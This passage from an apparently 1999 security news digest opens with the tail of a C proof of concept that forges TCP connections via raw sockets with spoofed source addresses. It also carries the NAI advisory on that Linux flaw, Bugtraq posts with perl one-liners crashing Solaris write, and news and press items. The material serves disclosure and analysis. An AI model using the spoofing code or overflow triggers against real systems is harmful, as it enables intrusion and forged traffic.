    pseudohead.proto = ip_head.protocol;
    pseudohead.length = htons(sizeof(struct tcphdr) + len);
    tcp_chk_construct.pshd = pseudohead;
    tcp_chk_construct.tcphd = tcp_head;
    if (len > 0)
        memcpy(tcp_chk_construct.tcpdata, buffer, len);
    tcp_head.th_sum = in_cksum((unsigned short *)&tcp_chk_construct,
                               sizeof(struct tcp_pseudo) + sizeof(struct tcphdr) + len);

    /*Assemble packet*/
    memcpy(packet, (char *)&ip_head, sizeof(ip_head));
    memcpy(packet + sizeof(ip_head), (char *)&tcp_head, sizeof(tcp_head));
    if (len > 0)
        memcpy(packet + sizeof(ip_head) + sizeof(tcp_head), buffer, len);

    /*Send packet*/
    target.sin_family = AF_INET;
    target.sin_addr.s_addr = ip_head.daddr;
    target.sin_port = tcp_head.th_dport;
    i = sendto(sfd, packet, sizeof(struct iphdr) + sizeof(struct tcphdr) + len, 0,
               (struct sockaddr *)&target, sizeof(struct sockaddr_in));
    if (i < 0)
        return (-1);        /* error */
    else
        return (i);         /* return number of bytes sent */
}
/*---------------------------------------------------------------------*/

int
main(int argc, char *argv[])
{
    int i;
    unsigned int source, target;
    unsigned short int s_port, d_port;
    char data[] = "abcdefg";    /* 7 characters plus NUL: 8 bytes on the wire */

    if (argc != 5) {
        fprintf(stderr, "usage: %s source_ip source_port target_ip target_port\n", argv[0]);
        exit(1);
    }
    source = inet_addr(argv[1]);
    s_port = atoi(argv[2]);
    target = inet_addr(argv[3]);
    d_port = atoi(argv[4]);
    if ((i = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {  /* open sending socket */
        perror("socket");
        exit(1);
    }
    send_tcp(i, source, s_port, target, d_port, SEQ, 0, SYN, NULL, 0);
    printf("SYN sent\n");
    usleep(1000);
    send_tcp(i, source, s_port, target, d_port, SEQ + 1, 0, 0, data, 8);  /* no flags set */
    printf("data sent\n");
    usleep(1000);
    send_tcp(i, source, s_port, target, d_port, SEQ + 9, 0, FIN, NULL, 0);
    printf("FIN sent\n");
    close(i);
    return 0;
}
--
Jochen Bauer
Institute for Theoretical Physics
University of Stuttgart
Germany
PGP public key available from:
http://www.theo2.physik.uni-stuttgart.de/jtb.html
-=- further discussion;
Date: Tue, 9 Mar 1999 16:28:24 -0800
From: Security Research Labs <seclabs@NAI.COM>
To: BUGTRAQ@netspace.org
Subject: Linux Blind TCP Spoofing
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=======================================================================
Network Associates, Inc.
SECURITY ADVISORY
March 9, 1999
Linux Blind TCP Spoofing
=======================================================================
SYNOPSIS
An implementation flaw in the Linux TCP/IP stack allows remote attackers
to forge TCP connections without predicting sequence numbers and pass
data to the application layer before a connection is established.
=======================================================================
VULNERABLE HOSTS
This problem is present in Linux kernels up to and including 2.0.35.
Any distribution containing a kernel revision less than this is vulnerable.
=======================================================================
DETAILS
TCP is a reliable connection-oriented protocol which requires the
completion of a three way handshake to establish a connection. To
implement reliable and unduplicated delivery of data, the TCP protocol
uses a sequence based acknowledgment system. During connection
establishment each host selects an initial sequence number which is
sent in the first packet of the connection. Each subsequent byte
transmitted in the TCP connection is assigned a sequence number.
To prevent duplicate or invalid segments from impacting established
connections TCP utilizes a state based model. In a typical
client-server application, the client initiates a connection by
transmitting a TCP segment to a listening server process. This
causes the state of the process to move from the LISTEN state into
SYN_RECEIVE if a SYN flag is present. During this state the server
acknowledges the client's request, setting both the SYN and ACK
flags. To complete the three way handshake the client acknowledges
the server's response, moving the server from SYN_RECEIVE to the
ESTABLISHED state.
To establish a forged TCP session an attacker must have knowledge
of or be able to predict the initial sequence number that is selected
by the server. An implementation flaw in the Linux kernel allows
data to be delivered to the application layer before the handshake
has completed.
=======================================================================
TECHNICAL DETAILS
The combination of three flaws in the Linux TCP/IP implementation
contribute to the existence of a security vulnerability. Firstly,
Linux only verifies the acknowledgment number of incoming segments
if the ACK flag has been set. Linux also queues data from TCP
segments without acknowledgment information prior to the
completion of the three way handshake but after the initial SYN
has been acknowledged by the server. Finally, Linux passes data to
the application layer upon the receipt of a packet containing the
FIN flag regardless of whether a connection has been established.
Together, these flaws allow an attacker to spoof an arbitrary
connection and deliver data to an application without the need to
predict the server's initial sequence number.
According to the standard, there is only one case wherein a correct
TCP/IP stack can accept data in a packet that does not have the ACK
flag set --- the initial connection-soliciting SYN packet can
contain data, but must not have the ACK flag set. In any other case,
a data packet not bearing the ACK flag should be discarded.
When a TCP segment carries an ACK flag, it must have a correct
acknowledgement sequence number (which is the sequence number of the
next byte of data expected from the other side of the connection).
TCP packets bearing the ACK flag are verified to ensure that their
acknowledgement numbers are correct.
Vulnerable Linux kernels accept data segments that do not have the
ACK flag set. Because the ACK flag is not set, the acknowledgement
sequence number is not verified. This allows an attacker to send
data over a spoofed connection without knowing the target's current
(or initial) sequence number.
Linux does not deliver data received from a TCP connection when the
connection is in SYN_RECEIVE state. Thus, an attacker cannot
successfully spoof a TCP transaction to a Linux host without somehow
completing the TCP handshake. However, an implementation flaw in
some Linux kernels allows an attacker to bypass the TCP handshake
entirely, by "prematurely" closing it with a FIN packet.
When a FIN packet is received for a connection in SYN_RECEIVE state,
Linux behaves as if the connection was in ESTABLISHED state and moves
the connection to CLOSE_WAIT state. In the process of doing this,
data queued on the connection will be delivered to listening
applications. If the ACK flag is not set on the FIN segment, the
target's sequence number is not verified in the segment.
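To make the three checks concrete, here is an added model of the receive path, constructed for this digest and not taken from the Linux kernel or the NAI advisory. `tcp_input()` implements the behaviour the advisory says the standard requires (only the initial SYN may lack ACK; every ACK is checked against our own ISN; data is delivered only once ESTABLISHED), and a `legacy` switch reproduces the three flaws so both variants can be run against the same exchange. The state name SYN_RECV is the Linux spelling of the advisory's SYN_RECEIVE; the function names, the ISN value, the sequence numbers and the "hello" payload are all assumptions of the model.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of the advisory's receive-path checks; not Linux kernel code. */
enum tcp_state { ST_LISTEN, ST_SYN_RECV, ST_ESTABLISHED, ST_CLOSE_WAIT };
#define FL_FIN 0x01
#define FL_SYN 0x02
#define FL_ACK 0x10
struct segment {
    unsigned flags;
    uint32_t seq, ack;       /* ack is meaningful only when FL_ACK is set */
    const char *data;        /* payload, may be NULL */
    size_t len;
};
struct conn {
    enum tcp_state state;
    uint32_t iss;            /* our initial sequence number: what a blind spoofer lacks */
    uint32_t rcv_nxt;        /* next byte expected from the peer */
    char queue[128]; size_t queued;    /* data held back until it may be delivered */
    char app[128];   size_t app_len;   /* bytes that actually reached the application */
    bool legacy;             /* true: reproduce the pre-2.0.36 behaviour the advisory describes */
};
void conn_init(struct conn *c, uint32_t iss, bool legacy)
{
    memset(c, 0, sizeof *c);             /* state starts as ST_LISTEN (0) */
    c->iss = iss;
    c->legacy = legacy;
}
static void queue_data(struct conn *c, const struct segment *s)
{
    size_t room = sizeof c->queue - c->queued;
    size_t n = s->len < room ? s->len : room;
    if (n == 0 || s->seq != c->rcv_nxt) return;   /* in-order data only */
    memcpy(c->queue + c->queued, s->data, n);
    c->queued += n;
    c->rcv_nxt += (uint32_t)n;
}
static void deliver(struct conn *c)
{
    memcpy(c->app + c->app_len, c->queue, c->queued);
    c->app_len += c->queued;
    c->queued = 0;
}

/* Returns 1 if the segment was accepted, 0 if it was dropped. */
int tcp_input(struct conn *c, const struct segment *s)
{
    if (c->state == ST_LISTEN) {
        /* The only segment that may lack ACK is the connection-soliciting SYN. */
        if (!(s->flags & FL_SYN) || (s->flags & FL_ACK)) return 0;
        c->rcv_nxt = s->seq + 1;         /* the SYN consumes one sequence number */
        c->state = ST_SYN_RECV;          /* we would now answer SYN+ACK with seq = iss */
        return 1;
    }
    if (s->flags & FL_ACK) {
        /* We send no data in this model, so the only correct acknowledgement is
         * iss + 1, which a blind spoofer would have to guess. */
        if (s->ack != c->iss + 1) return 0;
        if (c->state == ST_SYN_RECV) c->state = ST_ESTABLISHED;
    } else if (!c->legacy) {
        return 0;                        /* correct: any other ACK-less segment is dropped */
    }
    /* Only the legacy path gets here without ACK: nothing was verified (flaw 1)
     * and the data is queued even in SYN_RECV (flaw 2). */
    if (c->state == ST_SYN_RECV || c->state == ST_ESTABLISHED) queue_data(c, s);
    if (s->flags & FL_FIN) {
        if (c->state == ST_ESTABLISHED || (c->legacy && c->state == ST_SYN_RECV)) {
            /* Flaw 3: a FIN in SYN_RECV is handled as if ESTABLISHED, so the
             * connection moves to CLOSE_WAIT and the queue is flushed upward. */
            c->state = ST_CLOSE_WAIT;
            deliver(c);
        }
    } else if (c->state == ST_ESTABLISHED) {
        deliver(c);
    }
    return 1;
}

/* Replays a SYN, a data segment and a FIN.  real_client false: the advisory's
 * blind exchange, data and FIN without ACK, so no guess at iss is needed.
 * real_client true: both carry the genuine iss + 1.  Returns bytes delivered. */
size_t replay(bool legacy, bool real_client, struct conn *c)
{
    struct segment syn  = { FL_SYN, 1000, 0, NULL, 0 };
    struct segment data = { 0,      1001, 0, "hello", 5 };
    struct segment fin  = { FL_FIN, 1006, 0, NULL, 0 };
    conn_init(c, 0xA5A5A5A5u, legacy);
    if (real_client) { data.flags = FL_ACK; fin.flags |= FL_ACK; data.ack = fin.ack = c->iss + 1; }
    tcp_input(c, &syn); tcp_input(c, &data); tcp_input(c, &fin);
    return c->app_len;
}
int main(void)
{
    struct conn c;
    printf("legacy kernel, blind spoof: %zu bytes delivered\n", replay(true, false, &c));
    printf("fixed kernel,  blind spoof: %zu bytes delivered\n", replay(false, false, &c));
    return 0;
}
```

With `legacy` set, the ACK-less data segment is queued in SYN_RECV and the ACK-less FIN flushes it to the application without the ISN ever being checked; with the correct behaviour both segments are dropped and the connection stays in SYN_RECV, while a genuine client that supplies iss + 1 is still served, which is the property a fix has to preserve.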
=======================================================================
RESOLUTION
It is recommended that kernels below version 2.0.36 be upgraded to
eliminate this vulnerability.
Updated kernel packages for Red Hat Linux which are not vulnerable to
this problem are available from
http://www.redhat.com/support/docs/errata.html.
Both Debian and Caldera Linux have been contacted regarding this
vulnerability although no official response has been received.
The latest stable versions of the Linux kernel are available from
http://www.kernel.org.
=======================================================================
CREDITS
Analysis and documentation of this problem was conducted by Anthony
Osborne with the Security Labs at Network Associates. This
vulnerability was discovered on October 5, 1998.
=======================================================================
ABOUT THE NETWORK ASSOCIATES SECURITY LABS
The Security Labs at Network Associates hosts some of the most
important research in computer security today. With over 30 security
advisories published in the last 2 years, the Network Associates
security auditing teams have been responsible for the discovery of many
of the Internet's most serious security flaws. This advisory represents
our ongoing commitment to provide critical information to the security
community.
For more information about the Security Labs at Network Associates,
see our website at http://www.nai.com or contact us at
<seclabs@nai.com>.
=======================================================================
NETWORK ASSOCIATES SECURITY LABS PGP KEY
- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP 5.5.5
=L3C6
- ----
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv
iQA/AwUBNvLqq6F4LLqP1YESEQJH5QCg4FIv1+eRED+wYV5uMp2nVto/zHMAnjii
g3Q3t36ITPBKkdRCQGK4DCBe
=yLGh
-----END PGP SIGNATURE-----
--------------------------------------------------------------------------
Date: Wed, 10 Mar 1999 12:17:25 -0800
From: John D. Hardin <jhardin@WOLFENET.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Linux Blind TCP Spoofing (fwd)
---------- Forwarded message ----------
Date: Wed, 10 Mar 1999 19:46:13 +0000 (GMT)
From: Alan Cox <alan@lxorguk.ukuu.org.uk>
To: jhardin@WOLFENET.COM
Subject: Re: Linux Blind TCP Spoofing
> > It is recommended that kernels below version 2.0.36 be upgraded to
> > eliminate this vulnerability.
>
> This implies but does not explicitly state that 2.0.36+ kernels are
> not vulnerable. Is this the case?
NAI reported the problem to me during the 2.0.36 development period and
the bug was squashed.
@HWA
06.0 Solaris 2.6 x86 /usr/bin/write buffer overflow exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Mon, 8 Mar 1999 15:30:36 +0900
From: bugscan@KOSNET.NET
To: BUGTRAQ@netspace.org
Subject: Solaris "/usr/bin/write" bug
This is my first post to BugTraq
If this is old, I'm sorry.
When playing around with "/usr/bin/write" on Solaris 2.6 x86, I found something
interesting.
It's a buffer overflow bug in "/usr/bin/write".
To ensure, view this command:
( Solaris 2.6 x86 )
[loveyou@/user/loveyou/buf]{30}% write loveyou `perl -e 'print "x" x 97'`
[loveyou@/user/loveyou/buf]write loveyou `perl -e 'print "x" x 97'`
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxx permission denied
[loveyou@/user/loveyou/buf]write loveyou `perl -e 'print "x" x 98'`
Segmentation fault
( Solaris 2.5.1(2.5) sparc )
[love]/home/love> write loveyou `perl -e 'print "x" x 79'`
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
permission denied
[love]/home/love> write loveyou `perl -e 'print "x" x 80'`
Segmentation Fault
( Solaris 2.6 and 2.7 maybe .. )
bye bye ~ :)
----------------------------------------------------------------------------------
Date: Tue, 9 Mar 1999 17:16:26 +0000
From: John Riddoch <jr@SCMS.RGU.AC.UK>
Reply-To: John Riddoch <jr@master.scms.rgu.ac.uk>
To: BUGTRAQ@netspace.org
Subject: Re: Solaris "/usr/bin/write" bug
>when playing around with "/usr/bin/write" on Solaris 2.6 x86 , I found something
>interesting.
>It's buffer overflow bug in "/usr/bin/write"
>To ensure, view this command :
>
>( Solaris 2.6 x86 )
>[loveyou@/user/loveyou/buf]{30}% write loveyou `perl -e 'print "x" x 97'`
>[loveyou@/user/loveyou/buf]write loveyou `perl -e 'print "x" x 97'`
>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
>( Solaris 2.6 and 2.7 maybe .. )
This also segfaults under Solaris 2.6 and 7 on SPARC.
I'm not sure how exploitable this is, as it is only sgid tty, which isn't a
huge problem (but could be nonetheless, I suppose).
--
John Riddoch Email: jr@scms.rgu.ac.uk Telephone: (01224)262730
Room C4, School of Computer and Mathematical Science
Robert Gordon University, Aberdeen, AB25 1HG
I am Homer of Borg. Resistance is Fu... Ooooh! Donuts!
----------------------------------------------------------------------------------
Date: Tue, 9 Mar 1999 21:22:17 -0600
From: Chris Tobkin <tobkin@umn.edu>
To: BUGTRAQ@netspace.org
Subject: Re: Solaris "/usr/bin/write" bug
> ( Solaris 2.6 and 2.7 maybe .. )
(Solaris 2.7 x86)
[tobkin@2.7_x86](~)9:09pm> write loveyou `perl -e 'print "x" x 93'`
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxx permission denied
[tobkin@2.7_x86](~)9:09pm> write loveyou `perl -e 'print "x" x 94'`
Segmentation fault
(Solaris 2.6 sparc)
[tobkin@2.6_sparc](~)9:12pm> write loveyou `perl -e 'print "x" x 91'`
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxx permission denied
[tobkin@2.6_sparc](~)9:12pm> write loveyou `perl -e 'print "x" x 92'`
Segmentation fault
Looks like 2.6 for sparc and 2.7 intel have the same problem...
// chris
tobkin@umn.edu
*************************************************************************
Chris Tobkin tobkin@umn.edu
Java and Web Services - Academic and Distributed Computing Services - UMN
-----------------------------------------------------------------------
Laura: I took a business course at business college--
Jim: How did that work out?
Laura: Well, not very well...I had to drop out, it gave me...indigestion.
- Tennessee Williams - The Glass Menagerie
*************************************************************************
----------------------------------------------------------------------------------
Date: Tue, 9 Mar 1999 15:45:16 +0000
From: Dan - Sr. Admin <dm@GLOBALSERVE.NET>
To: BUGTRAQ@netspace.org
Subject: Re: Solaris "/usr/bin/write" bug
> This is my first post to BugTraq
> If this is old, I'm sorry.
> when playing around with "/usr/bin/write" on Solaris 2.6 x86 , I found something
> interesting.
> It's buffer overflow bug in "/usr/bin/write"
> To ensure, view this command :
[snip]
> ( Solaris 2.6 and 2.7 maybe .. )
>
> bye bye ~ :)
Confirmed under Sparc Solaris 2.6.
Although I have no source code to verify this, I would assume the problem
lies in a sprintf() call (or something similar) that builds the device to
open from the tty you specify on the command line.
However, even if this is overflowable into a shell with tty permissions,
I can see nothing useful coming out of it.
crw--w---- 1 dm tty 24, 0 Mar 9 14:39 pts@0:0
Those are the permissions on the terminal. The most I can see happening is
someone writing to my screen when I have messages turned off.
Regards,
--
Dan Moschuk (TFreak!dm@globalserve.net)
Senior Systems/Network Administrator
Globalserve Communications Inc., a Primus Canada Company
"Be different: conform."
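Dan's guess above is that the device path is built with sprintf() into a fixed-size buffer. Whether or not that is the real cause (no Solaris source is at hand to confirm it, and none of the posts claim more than a segfault), the hardened form of such a routine is worth having on the page. The following is an added example written for this digest, not Solaris code; the function name `build_tty_path`, the `/dev/` prefix and the 32-byte buffer in `main` are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical hardened form of a "build the device path from the tty
 * argument" routine.  Added illustration, not Solaris source. */
#define DEV_PREFIX "/dev/"

/* Writes "/dev/<tty>" into out (capacity outlen).  Returns 0 on success,
 * -1 if the name is rejected or would not fit.  out is always terminated. */
int build_tty_path(const char *tty, char *out, size_t outlen)
{
    if (outlen == 0) return -1;
    out[0] = '\0';
    if (tty == NULL || tty[0] == '\0' || tty[0] == '/')
        return -1;                       /* must be relative to /dev */
    if (strstr(tty, "..") != NULL)
        return -1;                       /* keep the path inside /dev */
    /* snprintf bounds the write; a return value >= outlen signals the
     * truncation that sprintf() would instead have turned into an overflow. */
    int n = snprintf(out, outlen, DEV_PREFIX "%s", tty);
    if (n < 0 || (size_t)n >= outlen) {
        out[0] = '\0';
        return -1;
    }
    return 0;
}

int main(int argc, char **argv)
{
    char dev[32];                        /* deliberately small to show the check */
    const char *tty = argc > 1 ? argv[1] : "pts/0";
    if (build_tty_path(tty, dev, sizeof dev) != 0) {
        fprintf(stderr, "write: bad tty name (%zu bytes)\n", strlen(tty));
        return 1;
    }
    printf("would open %s\n", dev);
    return 0;
}
```

The two checks that matter are independent: the length check turns a name longer than the buffer into a clean error instead of a crash, and the `/` and `..` checks stop a name from naming something outside `/dev`, which is the other classic failure of a routine that concatenates user input into a path.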
@HWA
07.0 New Computer Technology Makes Hacking a Snap - Washington Post
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
FUD throughout this article on script kiddies, but still a good
entertaining read and worthy of your time ...
http://www.washingtonpost.com/wp-srv/WPcap/1999-03/10/024r-031099-idx.html
New Computer Technology Makes Hacking a Snap
By Michael E. Ruane
Washington Post Staff Writer
Wednesday, March 10, 1999; Page A01
Used to be you had to have some know-how to crash a kernel. It would
take all night to snoop a connection, smash a stack or crack a password.
You could work forever trying to get to root.
Not any more.
Nowadays, any fresh-faced newbie can download a kiddie script, fire off a
vulnerability scan and, in no time, come up with a nice, juicy target list.
It's enough to make veteran hackers -- the handful of computer wizards
who speak a colorful language that once was all their own -- break down
and cry.
But it's true. Along with the breathtaking advances in computer technology
has come a vast proliferation of easy, ready-to-use computer hacking
programs, freely available on the Internet, and a boon to greenhorn
hackers.
"This is your nephew or your cousin," says Peter Tippett, president of the
Reston-based International Computer Security Association. "It's a kid who
says, 'This seems kind of cool. Let me just take this tool and aim it at Ford
Motor Company.' "
They use programs -- called "exploits," "tools" or "attacks" -- with names
like "Smurf," "Teardrop" and "John the Ripper."
Some are so-called "denial of service" programs, which sneak or barge in
and overwhelm a targeted system, shutting it down. Others are
"vulnerability scanners," which search the Net for specific weaknesses to
be exploited later. Still others are "penetration" attacks that break in and
take control.
Some attacks use a "Trojan Horse" -- benign-looking bait with an exploit
concealed inside. Others "spoof," using a bogus ID. Still others lie in wait
and spring when an unsuspecting victim pauses to visit.
A few are simply sent out to "sniff the traffic" on the Internet.
There are hundreds of them. So many that some have been given the name
kiddie scripts, because of their simplicity of use. Those who launch them
are called, of course, script kiddies. And experts say they may account for
95 percent of all external computer hacking attacks.
Hacking always seems to have been the purview of the young. Just last
year, five teenagers hacked into Defense Department computers, and last
month, a 15-year-old from Vienna was accused of hacking into Clemson
University's system and of trying to break into NASA's.
Experts believe there are now tens of thousands of hacking-related Web
sites, and hundreds that approach the subject seriously. The Pentagon,
traditionally the most assailed hacking target on Earth, announced Friday
that it is investigating another potent attack -- one of the 80 to 100 it
undergoes every day.
But in years past, hacking was tedious, demanding work that required
brains and dedication, and, if successful, was an envied notch in the cyber
gun. There was hacker esprit. There was a great "signal-to-noise" ratio --
intelligent talk vs. baloney. And there was the hacker code: Look, but
don't touch.
No longer.
"It used to be a small circle," says Dr. Mudge, a veteran Boston-area
hacker who operates a Web site with his sidekicks Kingpin, Brian
Oblivion, SpaceRogue and others. "Now it's almost mainstream, and like
anything that goes mainstream you get a lot of good and a lot of bad."
"Now people can hack without having to pay their dues," says Rob Clyde,
a vice president with the Rockville-based computer security firm, Axent
Technologies Inc.
"You no longer have to be an expert," he says. "You just have to have time
and motive. And the motive often times now is vandalism, destruction, just
blow away stuff, destroy it, make it look bad."
Sometimes it's even worse.
The FBI on Friday released an annual survey that it conducts with the San
Francisco-based Computer Security Institute, reporting that criminal
hacking caused $123 million in losses last year, and now posed "a growing
threat to . . . the rule of law in cyberspace."
Mostly, though, many experts say, the new add-water-and-stir hacking is
for amateurs. And most of them are still pretty young.
"We're talking 95 percent of hackers are script kiddies," Tippett says.
"We're talking a million events a month where people run those tools to see
what happens. Maybe one or two percent of hackers are people who
know what the tool actually does."
Peter Mell, a computer scientist at the National Institute of Standards and
Technology, in Gaithersburg, says, "Ten years ago if you wanted to break
into somebody's system, you would stay up all night long."
"You would manually go to their computer, try a few things, if it didn't
work you'd go to another computer, try a few things," he says. "Very
tedious. You'd spend all night doing it."
"Nowadays what somebody does is . . . at 6 o'clock, they download a
vulnerability scanner and an associated attack. They set the vulnerability
scanner running. They go out to a party . . . come home 11 at night. And
their computer has compiled a list for them of 2,000 hosts on the Internet
which are vulnerable to that attack."
"All they have to do is type the name of the computer that is vulnerable into
their attack script, and they have complete control of the enemy," he says.
The actual damage done by hackers is uncertain and some experts
suggested it is overstated by a computer industry eager to sell its services.
Those experts estimate that 80 percent of hacking comes from within a
corporation rather than through outside attacks.
Hacking lingo seems filled with military references like "attack" and
"target." But hacking also has -- along with its own magazines and an
annual convention -- an idiom all its own.
"Crashing a kernel," for example, refers to breaking down the core of an
operating system. "Smashing a stack" means taking over a vital part of a
computer's memory. "Snooping a connection" means breaking into a
conversation between two other computers. And the ultimate feat, "getting
to root," or more simply, "getting root," means seizing fundamental control
of a target system.
Mell, 26, a surgeon's son from St. Louis who said his brother taught him to
program in second grade, has conducted a study of published attacks that
smash, crash, seize and snoop by monitoring what people request at
hacker Web sites.
He has named the array of published attacks the Global Attack Toolkit.
And he has compiled a list of the top 20 recently most popular. He points
out that most attacks can be defended with so called "patches," but a few
are almost indefensible.
One of the most popular -- number 2 on his list -- and one that's tough to
counter is "Smurf."
"It's an attack where you overwhelm an enemy system with a huge number
of (information) packets . . . and their computer simply can't handle all of
the packets," he says. "The computer shuts down. If it's a Web site, the
Web site stops working. If it's the router going into the White House, the
White House traffic stops flowing."
Number one on his list was a Trojan Horse called "Back Orifice."
In a paper he wrote last year, Mell mentioned one hacker Web site that
lists 690 scripts, another that has 383 and another that lists 556.
"Together, the exploit script Web sites form an attack tool kit that is
available to literally everyone in the world," he wrote. "Somewhere on the
Internet, there exists a host vulnerable to almost every attack, and scanning
tools are readily available to find that host."
Mell says the attack scripts are posted on hacker Web sites by other
hackers, by disgruntled systems administrators trying to draw attention,
and eventually patches, to holes in their systems, and by "white hat"
hackers seeking to alert the computer security industry to vulnerabilities.
And he believes that posting easy scripts may not be all bad.
"When attacks are posted to the Internet, companies respond, and they fix
their software very quickly, and they release patches, and there's news
articles and advisories alerting people that there's this vulnerability," he
says.
"So by the public posting . . . in a way it makes the world safer, because
everybody knows what's out there and they're prepared," he says. "If the
scripts weren't published, intrusion-detection companies wouldn't know
where to get their data, security companies wouldn't know that their
applications had holes in them."
"At the same time that these attack scripts make it available for anyone in
the world with very little intelligence to download and run attacks, it also
means that security companies are quick on their feet to respond to them."
But computer security firms are not sitting idly by. They have their own
intrusion detection programs -- some of which are recon missions, if you
will, that "sniff" the traffic to ambush roving attack scripts.
Mell says there is a "Virtual Suicide" Web site where systems operators
can request an attack to test security. Visitors can ask to be "crippled,"
"beheaded" or "vaporized."
Perhaps the most sinister attacks, though, are passive. Apparently small in
number, Mell says in his report, they "require a target to visit the hacker's
Web site" before striking.
Soon, he writes, "the Internet may develop 'bad parts of town.'"
"Watch where you walk!"
© Copyright 1999 The Washington Post Company
@HWA
08.0 "Super Hacker Apprehended"
~~~~~~~~~~~~~~~~~~~~~~~~~~
Seen initially on Help Net Security's site the article is printed
here below;
KOREAN "SUPERHACKER" BUSTED
by deepcase, Tuesday 9th Mar 1999 at 1:05 pm CET
Kim, a 15 year old high school student from Korea, got busted by the
police after 152 people complained about the "super viruses" that he
distributed by email. Kim told police that he mailed the viruses to
demonstrate his talents and to find out if anyone could break them. The
viruses were so complex that they were virtually impossible to kill.
The spokesman said that Kim was known as a computer genius from the 7th
grade, when he learned to handle the machine code language assembly 3.
The spokesman added "Kim is one of just forty to fifty people in Korea
with such a talent". A National Police Officer said that Kim could have
become a "national treasure" in the information society of the future and
that he will guide Kim along the legal path of computer work.
Referenced url: http://www.chosun.com/w21data/html/news/199903/199903050334.html
Super Hacker Apprehended
A police spokesman announced Friday that officers had apprehended a
super hacker who turned out to be a fifteen year old high school boy named
Kim. To date 152 people have filed complaints about the 15 super viruses
Kim created and e-mailed, but police expect the final figure to be over
2,000.
Kim told police that he mailed the viruses to demonstrate his talents and to
find out if anyone could develop a 'vaccine' for them. The viruses were so
complex that they were virtually impossible to kill. The spokesman said that
Kim was known as a computer genius from the 7th grade, when he learned
to handle the machine code language 'assembly 3', one of just forty to fifty
people in Korea with such a talent.
Yang Keun-won, head of the National Police Office's computer crime team
commented that a virus creator and hacker like Kim could become a
"national treasure" in the information society of the future. He added that he
will guide Kim along the legal path of computer work.
(Park Joon-hyun, jhpark@chosun.com)
@HWA
09.0 The l0pht and NFR team up to produce top flight IDS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.nfr.net/news/press/19990301-l0pht-filters.html
NFR and L0pht to Deliver Best-of-Breed Intrusion Detection
L0pht to use extensive knowledge of attack signatures to expand filter set
for NFR software
01 March 1999 Washington, DC and Boston, MA Network Flight Recorder®
(Bloomberg Ticker: 9022Z EQUITY) and L0pht Heavy Industries, Inc. today
announced a strategic relationship that redefines the boundaries for
cooperation in intrusion detection. In a partnership that combines the
respected "white-hat" knowledge of attack signatures with the industry
leading intrusion detection engine, L0pht will create a large set of
backends for the NFR software.
The backends, or filters, will provide users with real-time alerts for
various types of intrusions and unwanted activity on their networks,
including information gathering, denial of service, and network attacks.
As soon as the NFR system is attached to the network, the new backends
will begin watching for common and obscure attacks.
New backends, which will be provided to users on a monthly basis, will
watch for the latest attacks. Administrators can automatically push the
new backends to remote NFR systems, without having to upgrade or modify
any software. Because the backends will be written in N-Code, NFR's
flexible open-standard traffic analysis specification language, users can
examine and verify the underlying code, or modify them to match their
internal security policies.
Commenting on the partnership, Marcus J. Ranum, President and CEO of
Network Flight Recorder, noted, "L0pht has an amazing depth of information
about system vulnerabilities, and are the ideal source for cutting edge
intrusion detection signatures. By adding their 'white-hat' knowledge to
our existing capabilities, we have an unbeatable combination. Today, NFR
is the most popular intrusion detection and monitoring system for many of
our users based on its powerful customizable capabilities; with the
formation of this partnership we further cement our lead in the industry."
In a recent user poll, NFR soundly outperformed intrusion detection
products from Axent (NASDAQ: AXNT), ISS (NASDAQ: ISSX), and Cisco (NASDAQ:
CSCO). "When real network managers and users rate your product as best,
that's satisfying," continues Ranum. "Our product shines where it
matters the most: solving real problems and securing real networks for
real network managers."
"Having the ability to handle strange network traffic in a flexible manner
and the ability to tweak even the lowest level components of the intrusion
detection engine offers a functionality scope and comfort level that other
products simply cannot attain," said Dr. Mudge of L0pht Heavy Industries,
Inc. "In this field the consumer is really purchasing an elevation in
peace-of-mind about the way their network works. This cannot
be done on blind faith alone. NFR was the only commercial package capable
of being used for intrusion detection that released full source code to
the academic community. Combine this with the network and computer
security expertise that is found at L0pht and the history that L0pht has
for being a consumer watchgroup, and the two companies working together
on projects was a logical next step."
Availability
The L0pht intrusion detection backends will be included in the next
commercial release of the NFR software, scheduled for availability in
early second quarter 1999. NFR software can be purchased from certified
NFR resellers worldwide.
About Network Flight Recorder (NFR)
Network Flight Recorder, with offices around the United States and
resellers worldwide, is a leading developer of intrusion detection,
network traffic, and network analysis tools. The flexibility of the NFR
software provides effective local and distributed misuse detection
solutions for small, medium, and large environments. NFR's highly
customizable technology is deployed at more than 1,000 sites worldwide,
including financial institutions, government, military and intelligence
agencies, and Fortune 500 firms. NFR news and company information can be
found on The Bloomberg under the ticker symbol: 9022Z EQUITY and on the
World Wide Web at http://www.nfr.net.
About L0pht Heavy Industries, Inc.
L0pht [L0PHT] Heavy Industries, Inc., has been recognized as a collection
of some of the top hackers in the US. Since the early 90s, L0pht has acted
as a consumer watchgroup and underground engineering team whose goal has
been improving computer and network security while educating users,
